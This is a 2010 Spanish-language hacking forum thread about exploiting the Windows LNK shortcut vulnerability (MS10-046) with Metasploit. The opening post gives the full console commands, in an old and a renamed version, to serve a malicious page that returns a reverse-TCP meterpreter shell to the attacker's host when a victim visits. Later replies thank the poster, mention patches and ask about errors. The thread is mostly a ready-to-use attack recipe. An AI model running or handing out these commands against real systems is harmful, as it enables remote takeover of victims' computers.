Indetectables

Indetectables es una Comunidad de Hacking, Seguridad Informática, Impresión 3d y Desarrollo
./index.php

Explotando "LNK" con MetaSploit!!!

https://www.indetectables.net/viewtopic.php?t=24457

Página 1 de 2

Explotando "LNK" con MetaSploit!!!

Publicado: 22 Jul 2010, 09:15
por 4n0nym0us
MetaSploit nuevamente tiene un PoC para una vulnerabilidad que todavía no posee un parche de corrección de Microsoft.

Para testear esta vulnerabilidad primero debemos actualizar el framework con "svn update", y luego hacemos lo siguiente:

Código: Seleccionar todo

Antiguo:
use windows/browser/ms10_xxx_windows_shell_lnk_execute
set SRVHOST 192.168.162.136
set SRVPORT 80
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.162.136
set LPORT 443
exploit

Código: Seleccionar todo

Nuevo:
use windows/browser/ms10_046_shortcut_icon_dllloader
set SRVHOST 192.168.162.136
set SRVPORT 80
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.162.136
set LPORT 443
exploit

De esta forma vamos a levantar un servidor web en el puerto 80, que cuando la víctima lo visite, nos dará una shell de meterpreter a través del puerto 443. Funciona muy bien!

Re: Explotando "LNK" con MetaSploit!!!

Publicado: 22 Jul 2010, 09:24
por shiva-sheva
Gracias 4n0nym0us ya consia este exploit para ejecutar archivos de echo en el taller de pentest les enseñare unos temas mas efectivos y mas complejos! espero verte pro ahi! saludos gracias por el aporte!

Re: Explotando "LNK" con MetaSploit!!!

Publicado: 25 Jul 2010, 04:10
por blackdog
que hay que hacer para ir al taller de pentest?hay que inscribirse en algun lado?

Re: Explotando "LNK" con MetaSploit!!!

Publicado: 24 Sep 2010, 16:57
por simpl3x
Disculpen Pero todavia existe esta vulnarabilidad.....

salud2

gracias

Re: Explotando "LNK" con MetaSploit!!!

Publicado: 26 Sep 2010, 08:32
por uxisar
muchisimas gracias amigo , he estado buscando esto mucho tiempo , gracias!!!

Re: Explotando "LNK" con MetaSploit!!!

Publicado: 03 Oct 2010, 17:14
por rere2
Si, todas lo son.

Re: Explotando "LNK" con MetaSploit!!!

Publicado: 04 Oct 2010, 09:37
por crsi
pues yo actualizo metasploit no me aparece

Re: Explotando "LNK" con MetaSploit!!!

Publicado: 04 Oct 2010, 12:05
por 4n0nym0us
Le cambiaron el nombre al Exploit, lo reedito y pongo el nombre actualizado

Re: Explotando "LNK" con MetaSploit!!!

Publicado: 04 Oct 2010, 17:57
por dehombreadios
ya hay parche para eso [Enlace externo eliminado para invitados]

Re: Explotando "LNK" con MetaSploit!!!

Publicado: 04 Oct 2010, 18:15
por LuisN2
browser autopwn es mejor a mi parecer... lo que pasa esque nunca lo eché a andar, porque al enviar mi ip pública no va!

Re: Explotando "LNK" con MetaSploit!!!

Publicado: 04 Oct 2010, 19:31
por 4n0nym0us
Sí el primer parche lo sacó G-Data... antes que Microsoft

Re: Explotando "LNK" con MetaSploit!!!

Publicado: 08 Oct 2010, 05:17
por faria89
gracias amigo se ve interesante

Re: Explotando "LNK" con MetaSploit!!!

Publicado: 04 Dic 2010, 18:28
por lothos
Muchas gracias amigo! Yo estavas precisando! muy interesante

Re: Explotando "LNK" con MetaSploit!!!

Publicado: 30 Dic 2010, 22:31
por TRiGuNZ

Código: Seleccionar todo

 Exploit exception: The address is already in use (95.16.136.43:80).
Que hay que hacer en este caso?
Todos los horarios son UTC+02:00
Página 1 de 2

© Indetectables Team

Desarrollado por Indetectables LAB